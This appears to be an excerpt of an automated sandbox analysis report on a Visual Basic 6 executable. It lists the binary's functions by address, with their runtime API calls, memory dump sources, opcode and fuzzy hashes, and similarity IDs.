                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$Error$ListSystem$Ansi$Copy$Chkstk$#525#580#600#616BoundsBstrChangeCheckCloseConstruct2DestructFindGenerateHresultNotificationOverflowUnicode
                                                                                                                                                                                  • String ID: D
                                                                                                                                                                                  • API String ID: 4167556621-2746444292
                                                                                                                                                                                  • Opcode ID: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
                                                                                                                                                                                  • Instruction ID: 28a137cb3eb25e758eafbfe2ee42426fba9f6ce594aea99c4a1f109bb6dd76d7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CE1B876900104EFD705EBE0EE989DF7BB9EB4C301B10812AF617A7264DF745A45CBA8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004125A0 Relevance: 54.2, APIs: 36, Instructions: 195COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,00000000), ref: 004125BE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00412619
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00412628
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041263C
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041265A
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00412661
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 004126AC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004126B7
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                                                  • #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041274B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412760
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 00412767
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041278E
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004127B4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000004), ref: 004127D5
                                                                                                                                                                                  • #618.MSVBVM60(00000000), ref: 004127DC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004127E7
                                                                                                                                                                                  • __vbaI4Str.MSVBVM60(00000000), ref: 004127EE
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412805
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00412838
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041283F
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00412888), ref: 00412878
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00412881
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0041289E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1066637744-0
                                                                                                                                                                                  • Opcode ID: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
                                                                                                                                                                                  • Instruction ID: 32f108f087d7d4630656b8080de6af3654730a431ac790d0d60a92850006a6c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A81B5B1D00248EBDB04DFE4DE58BDEBBB4BB48305F10852AE612B76A0DB745A45CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040FBA0 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                                                    • Part of subcall function 0040F8F0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                                                    • Part of subcall function 0040F8F0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                                                    • Part of subcall function 0040F8F0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                                                    • Part of subcall function 0040F8F0: __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                                                  • #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                                                  • #609.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC65
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6,?), ref: 0040FC70
                                                                                                                                                                                  • __vbaVarDup.MSVBVM60 ref: 0040FC8A
                                                                                                                                                                                  • #709.MSVBVM60(00000000,004055FC,000000FF,00000000,?), ref: 0040FCBF
                                                                                                                                                                                  • #616.MSVBVM60(00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FCD7
                                                                                                                                                                                  • #650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 0040FCEA
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FCF5
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040FCFC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FD07
                                                                                                                                                                                  • #535.MSVBVM60(00000000), ref: 0040FD0E
                                                                                                                                                                                  • __vbaStrR4.MSVBVM60 ref: 0040FD18
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FD23
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040FD2A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FD35
                                                                                                                                                                                  • __vbaNameFile.MSVBVM60(00000000), ref: 0040FD3C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000006,?,00000000,?,?,?,00000000), ref: 0040FD5C
                                                                                                                                                                                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000000,?,00000000,004025E6,?), ref: 0040FD6F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
                                                                                                                                                                                  • String ID: yymmdd
                                                                                                                                                                                  • API String ID: 2807397001-2871001947
                                                                                                                                                                                  • Opcode ID: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                                                  • Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040F8F0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1195834276-0
                                                                                                                                                                                  • Opcode ID: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                                                                                                  • Instruction ID: 20dc9a41ebc36c65f54ff828c917c87bbfccee6e827f5727337c9189070ed0dc
                                                                                                                                                                                  • Opcode Fuzzy Hash: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                                                                                                  • Instruction Fuzzy Hash: 05015EB1900205AFCB149FA8C94AB6E7BB8EB44700F50453AF555F3290D73899458B99
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040F9A0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9DB
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9E9
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9F4
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9FD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1195834276-0
                                                                                                                                                                                  • Opcode ID: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
                                                                                                                                                                                  • Instruction ID: 19c458602e53a293f3e6311b0924b7b74753bb6bdf76692d44a87d1e904a729f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
                                                                                                                                                                                  • Instruction Fuzzy Hash: 87019E71A00205AFCB049BB8CD4AA6F7BB8FB48740F50413AF515F32D0D73899058B99
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040290C Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 652 40290c-402932 #100 653 402933-402934 652->653 653->653 654 402936-402942 653->654
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: #100
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1341478452-0
                                                                                                                                                                                  • Opcode ID: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                                                                                                  • Instruction ID: 67256ad5df038b3606e19c3fd4962ab61de0c6f9014364b0e1939c668627c31a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F0139628E3C60EC303576409269487F705D4316030A42EBD1C5DF0E3D298494AC767
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 00412C10 Relevance: 684.7, APIs: 386, Strings: 4, Instructions: 2188COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E3F
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E47
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 00412E4B
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000101,?,00000000), ref: 00412E76
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412E89
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412E95
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412EAE
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000100,?,00000000), ref: 00412EE7
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412EFA
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412F06
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412F1F
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 00412F30
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00412F3C
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,00000278,?,00000000), ref: 00412F62
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,00000000), ref: 00412F71
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,0000011C,?,00000000), ref: 00412F91
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,00000084,?,00000000), ref: 00412FDC
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,0000008C,?,00000000), ref: 00413024
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,00000154,?,00000000), ref: 00413049
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,00000050,?,00000000), ref: 0041306D
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,000000E0,?,00000000), ref: 004130A3
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,00000000,00000000,00000003,?,00000000), ref: 004130C9
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000264,?,00000000), ref: 004130FE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 00413110
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000002,00000003,00000000,?,00000000,?,00000000), ref: 00413138
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041314C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041317F
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 0041320C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?), ref: 00413234
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?), ref: 00413252
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?), ref: 00413270
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?), ref: 004132B6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132C0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004132C3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132CD
                                                                                                                                                                                  • #537.MSVBVM60(00000000,00000000), ref: 004132D2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132DC
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004132DF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132E9
                                                                                                                                                                                  • #537.MSVBVM60(00000000,00000000), ref: 004132EE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132F8
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004132FB
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00413305
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041332C
                                                                                                                                                                                  • #537.MSVBVM60(?,?), ref: 00413355
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041335F
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00413362
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041336C
                                                                                                                                                                                  • #537.MSVBVM60(?,00000000), ref: 00413377
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00413381
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00413384
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041338E
                                                                                                                                                                                  • #537.MSVBVM60(?,00000000), ref: 00413399
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004133A3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004133A6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004133B0
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 004133D7
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00413434
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413487
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041349F
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004134BF
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004134D2
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00413516
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00413548
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 004135CC
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413610
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 00413645
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00413654
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413667
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041368D
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 0041369E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004136D5
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 00413706
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00413715
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413728
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413748
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00413757
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413786
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 004137B7
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 004137C6
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004137D9
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004137F9
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041382A
